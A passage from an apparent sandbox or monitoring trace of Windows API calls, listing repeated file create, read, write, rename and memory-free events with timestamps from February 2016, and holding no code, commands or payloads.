
{"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,482", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,512", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:41,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:41,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,562", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,572", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:41,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,652", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:41,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:41,752", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:41,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,792", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", 
